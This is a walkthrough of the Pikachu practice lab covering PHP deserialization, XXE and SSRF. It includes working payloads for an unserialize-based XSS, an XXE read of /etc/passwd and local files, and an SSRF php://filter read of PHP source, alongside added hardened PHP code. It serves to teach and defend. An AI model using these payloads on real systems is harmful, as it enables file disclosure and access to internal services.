Pikachu practice range - PHP deserialization, XXE, SSRF

PHP deserialization

I. Overview

Before understanding this vulnerability, we need to understand two PHP functions: serialize() and unserialize().

Serialization: serialize()


Put simply, serialization turns an object into a string that can be transmitted. For example, take the following object:

    class S {
        public $test = "pikachu";
    }
    $s = new S();       // create an object
    serialize($s);      // serialize this object

    The serialized result looks like this: O:1:"S":1:{s:4:"test";s:7:"pikachu";}
        O: an object
        1: length of the class name (one character)
        S: class name of the object
        1: number of member variables in the object
        s: data type (string)
        4: length of the variable name
        test: variable name
        s: data type (string)
        7: length of the variable value
        pikachu: variable value

Deserialization: unserialize()


It restores a serialized string back into an object, which the code can then go on using:

    $u = unserialize('O:1:"S":1:{s:4:"test";s:7:"pikachu";}');
    echo $u->test;   // prints pikachu

  Serialization and deserialization are not a problem in themselves, but if the content being deserialized is controlled by the user and the backend uses PHP magic methods improperly, security problems follow.

  Several common magic methods:
        __construct()   called when an object is created

        __destruct()    called when an object is destroyed

        __toString()    called when an object is used as a string

        __sleep()       run before an object is serialized

        __wakeup()      called immediately after an object is deserialized

        Vulnerability example:

        class S {
            var $test = "pikachu";
            function __destruct() {
                echo $this->test;
            }
        }
        $s = $_GET['test'];
        @$unser = unserialize($s);

        Payload: O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}

        Because __destruct() echoes $test without escaping when the object is destroyed, whoever controls the serialized string controls what the page prints.
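As an added example (not code from the Pikachu range or the original post), here is the vulnerable pattern above beside two ways to keep attacker-controlled input away from object instantiation; the HMAC secret is a placeholder.

```php
<?php
// Added example, not Pikachu's code: the vulnerable pattern from above beside two defences.
class S {
    public $test = "pikachu";
    function __destruct() {
        echo $this->test;   // runs even for objects an attacker built through unserialize()
    }
}

// Constructed payload with the same shape as the walkthrough's.
$payload = 'O:1:"S":1:{s:4:"test";s:29:"<script>alert(\'xss\')</script>";}';

// Vulnerable: raw input reaches unserialize(), S is instantiated and __destruct() echoes attacker data.
function vulnerable(string $input) {
    return @unserialize($input);
}

// Defence 1 (PHP >= 7.0): allowed_classes => false. Objects in the input become
// __PHP_Incomplete_Class, whose magic methods never run.
function no_objects(string $input) {
    return unserialize($input, ['allowed_classes' => false]);
}

// Defence 2: only deserialize blobs the server itself produced, verified by HMAC under a
// server-side secret, and still restrict which classes may be instantiated.
const SECRET = 'replace-with-a-random-secret';   // placeholder, assumed to come from config
function sign(string $blob): string {
    return hash_hmac('sha256', $blob, SECRET) . '.' . $blob;
}
function verified_unserialize(string $signed) {
    [$mac, $blob] = explode('.', $signed, 2) + [1 => null];
    if ($blob === null || !hash_equals(hash_hmac('sha256', $blob, SECRET), $mac)) {
        return null;   // missing, forged or tampered signature: never deserialize
    }
    return unserialize($blob, ['allowed_classes' => ['S']]);
}

var_dump(no_objects($payload) instanceof __PHP_Incomplete_Class);   // bool(true), nothing echoed
var_dump(verified_unserialize($payload));                            // NULL: no valid signature
$trusted = verified_unserialize(sign('O:1:"S":1:{s:4:"test";s:7:"pikachu";}'));
var_dump($trusted->test);   // string(7) "pikachu"; __destruct() echoes it again at shutdown
```

Where the data does not need to be a PHP object at all, json_decode() is the simpler fix: JSON cannot instantiate arbitrary classes.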

    

  

II. PHP deserialization vulnerability

① Looking at the source, we find an interface that accepts a deserialized object; the parameter passed in is not filtered at all.

 

 ② We use the following code to generate the serialized string.

<?php
class S{
var $test = "<script>alert('xss')</script>";
}
echo '<br>';
$a = new S();
echo serialize($a);
?>

  ③ Save it as a new file and access it through the URL

Here I use localhost/pikachu-master/test.php

 ④ Right-click and View Page Source

 ⑤ Copy the part after <br>, O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}, into the level's input, and the XSS attack fires

XXE

I. Overview

XXE, "XML external entity injection", is the XML external entity injection vulnerability.
In summary: "the attacker injects a specified XML entity into content sent to the server, and the server acts according to that specified configuration, causing problems."
That is, the server receives and parses XML data from the user side without strict security controls, which leads to XML external entity injection.

For a detailed introduction to XML entities there is plenty of material on the web; look it up first.
Many languages now disable the parsing of external entity content in their XML parsing functions by default, which directly avoids this vulnerability.
Take PHP as an example: PHP parses XML with libxml, and from libxml 2.9.0 on, parsing of external entity content is disabled by default.

 

 

XML is an extensible markup language. It can be used to store data, for example the .xml files we often see, and it can also be used to transmit data: XML-formatted data can be placed directly in a request and sent to the server.

An XML document has three parts:

Part 1: XML declaration
<?xml version="1.0"?>

Part 2: Document Type Definition (DTD)
<!DOCTYPE note [
<!-- defines that this document is a note type of document -->
<!ENTITY entity-name SYSTEM "URI/URL">
<!-- external entity declaration -->
]>

Part 3: document elements
<note>
<to>Dave</to>
<from>Tom</from>
<head>Reminder</head>
<body>You are a good man</body>
</note>

The DTD (Document Type Definition) defines the syntax constraints of an XML document; it can be declared inline or reference an external DTD. As noted above, many languages now disable resolution of external entity content in their XML parsers by default, which directly avoids this vulnerability.

① Internal DTD declaration format
<!DOCTYPE root-element [element declarations]>

② External DTD reference format
<!DOCTYPE root-element SYSTEM "URI of the external DTD">

③ Public DTD reference format
<!DOCTYPE root-element PUBLIC "DTD identifier name" "URI of the public DTD">

External entity reference payload:

<?xml version="1.0"?>

<!DOCTYPE ANY [
<!ENTITY f SYSTEM "file:///etc/passwd">
]>

<x>&f;</x>

II. XXE vulnerability

① Enter a payload

<?xml version = "1.0"?>
<!DOCTYPE note [
<!ENTITY hacker "ESHLkangi">
]>
<name>&hacker;</name> 

 

 The content of the entity we defined is printed on the front end.

② Payload to read a file

<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY f SYSTEM "file:///C://2.txt">
]>
<x>&f;</x>
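Added example, not Pikachu's code: how the PHP side should parse XML from users so that the payload above stays inert. The input is a constructed copy of the page's file-read payload, and the libxml behaviour is the one described in the overview.

```php
<?php
// Added example, not Pikachu's code: parsing untrusted XML in PHP without resolving external
// entities. The input is constructed to match the walkthrough's file-read payload.
$untrusted = '<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY f SYSTEM "file:///etc/passwd">
]>
<x>&f;</x>';

// Vulnerable pattern: LIBXML_NOENT tells libxml to substitute entities, external ones
// included, so the referenced file lands in <x>. On libxml < 2.9.0 this happens even
// without the flag, which is why the overview mentions that version.
function parse_vulnerable(string $xml): string {
    $dom = new DOMDocument();
    $dom->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD);
    return $dom->getElementsByTagName('x')->item(0)->textContent;
}

// Hardened pattern: reject any document that carries a DTD, never pass LIBXML_NOENT,
// forbid network access during parsing, and on PHP < 8.0 switch the entity loader off.
function parse_safe(string $xml): ?string {
    if (preg_match('/<!DOCTYPE/i', $xml)) {
        return null;                        // no DTD means no entity declarations at all
    }
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true); // deprecated in 8.0 because libxml >= 2.9 is safe by default
    }
    libxml_use_internal_errors(true);       // keep parser errors out of the HTTP response
    $dom = new DOMDocument();
    if (!$dom->loadXML($xml, LIBXML_NONET)) {
        return null;
    }
    $node = $dom->getElementsByTagName('x')->item(0);
    return $node ? $node->textContent : null;
}

var_dump(parse_safe($untrusted));            // NULL: refused because of the DOCTYPE
var_dump(parse_safe('<x>&amp;f;</x>'));    // string(3) "&f;": only built-in entities expand
```

The same DOCTYPE check in front of simplexml_load_string() or XMLReader gives those parsers the same protection.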


SSRF

I. Overview

SSRF (Server-Side Request Forgery)

It arises mostly because the server provides the ability to fetch data from other server applications, but does not filter or strictly restrict the target address.
An attacker can pass in an arbitrary address to make the backend server send a request to it, and the data from that request is returned to the attacker.

Data flow: attacker -----> server ----> target address

Depending on which function the backend uses, the impact differs accordingly.

The following PHP functions, used improperly, lead to SSRF:
file_get_contents()
fsockopen()
curl_exec()

If the backend server must request resources from an address specified by remote users (or embedded in the front-end request), filter the target address.

II. SSRF (curl)

if (isset($_GET['url']) && $_GET['url'] != null) {
    // Receiving a URL from the front end is fine, but it must be filtered; without filtering it leads to SSRF
    $URL = $_GET['url'];
    $CH = curl_init($URL);
    curl_setopt($CH, CURLOPT_HEADER, FALSE);
    curl_setopt($CH, CURLOPT_SSL_VERIFYPEER, FALSE);
    $RES = curl_exec($CH);
    curl_close($CH);
    // The SSRF problem: the url passed in from the front end is requested by the backend with curl_exec(),
    // and the result of that request is returned to the front end.
    // Besides http/https, curl supports other protocols; run curl --version to see which ones, e.g. telnet.
    // curl supports many protocols: FTP, FTPS, HTTP, HTTPS, GOPHER, TELNET, DICT, FILE and LDAP.
    echo $RES;
}


 Looking at the source, we see the request target comes from the url parameter. Pikachu here runs on my host, which is linked to a virtual machine, so I change the url to access the file 1.txt under pikachu-master on the virtual machine; the content of the file is GOOD MAN.

URL (the virtual machine's IP is 192.168.233.138):

http://192.168.233.138/pikachu-master/vul/ssrf/ssrf_curl.php?url=http://192.168.233.138/pikachu-master/1.txt


III. SSRF (file_get_contents)

Then we click the link and find it works just the same.

Look at the source code:

<?php
// Read PHP source code: php://filter/read=convert.base64-encode/resource=ssrf.php
// Intranet request: http://xxxx/xx.index
if (isset($_GET['file']) && $_GET['file'] != null) {
    $filename = $_GET['file'];
    $str = file_get_contents($filename);
    echo $str;
}
?>

  

The only difference from the experiment above is that file_get_contents is used.

 Read the PHP source file: php://filter/read=convert.base64-encode/resource=ssrf.php

Intranet request: http://xxxx/xx.index

So inside file_get_contents we can use the php://filter wrapper to read the PHP source.

We construct this URL:

localhost/pikachu-master/vul/ssrf/ssrf_fgc.php?file=php://filter/read=convert.base64-encode/resource=ssrf.php
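Added example, not the Pikachu source, covering both the curl handler above and this file_get_contents variant: the same target validation belongs in front of either call. The allow-listed host names are an assumption for the demo.

```php
<?php
// Added example, not Pikachu's code: validating the target before curl_exec() or
// file_get_contents() ever sees it. The allow-listed hosts are an assumption for the demo.
const ALLOWED_HOSTS = ['example.com', 'cdn.example.com'];

function is_internal_ip(string $ip): bool {
    // NO_PRIV_RANGE rejects 10/8, 172.16/12, 192.168/16, fc00::/7; NO_RES_RANGE rejects
    // 127/8, 169.254/16, 0/8, ::1 and similar, so loopback and metadata addresses fail too.
    return filter_var($ip, FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false;
}

// Returns the URL if it may be fetched, null otherwise. Allow-list, not deny-list.
function validate_target(string $url): ?string {
    $p = parse_url($url);
    if ($p === false || !isset($p['scheme'], $p['host'])) return null;
    if (!in_array(strtolower($p['scheme']), ['http', 'https'], true)) return null; // no file:, php:, gopher:, dict:
    if (isset($p['user']) || isset($p['pass'])) return null;                        // no user@host confusion
    $host = strtolower($p['host']);
    if (!in_array($host, ALLOWED_HOSTS, true)) return null;
    foreach (gethostbynamel($host) ?: [] as $ip) {      // a public name must not resolve inward
        if (is_internal_ip($ip)) return null;
    }
    return $url;
}

function fetch(string $url): ?string {
    $target = validate_target($url);
    if ($target === null) return null;
    $ch = curl_init($target);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER  => true,
        CURLOPT_PROTOCOLS       => CURLPROTO_HTTP | CURLPROTO_HTTPS, // curl would otherwise speak file:, gopher:, dict: ...
        CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_FOLLOWLOCATION  => false,   // a redirect to an internal address must not be followed
        CURLOPT_SSL_VERIFYPEER  => true,    // the walkthrough's handler switched this off
        CURLOPT_TIMEOUT         => 5,
    ]);
    $res = curl_exec($ch);
    curl_close($ch);
    return $res === false ? null : $res;
}

// Checks that need no network: every hostile input is refused before any request is made.
var_dump(validate_target('file:///etc/passwd'));                                    // NULL
var_dump(validate_target('php://filter/read=convert.base64-encode/resource=ssrf.php')); // NULL
var_dump(validate_target('http://192.168.233.138/pikachu-master/1.txt'));            // NULL: not allow-listed
var_dump(validate_target('http://127.0.0.1/'));                                      // NULL
```

The resolve-then-fetch check still leaves a DNS rebinding window; pinning the checked address with CURLOPT_RESOLVE closes it. For file_get_contents(), the scheme check above is what rules out the php://filter wrapper used in this level.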

 

Origin: www.cnblogs.com/c1047509362/p/12638672.html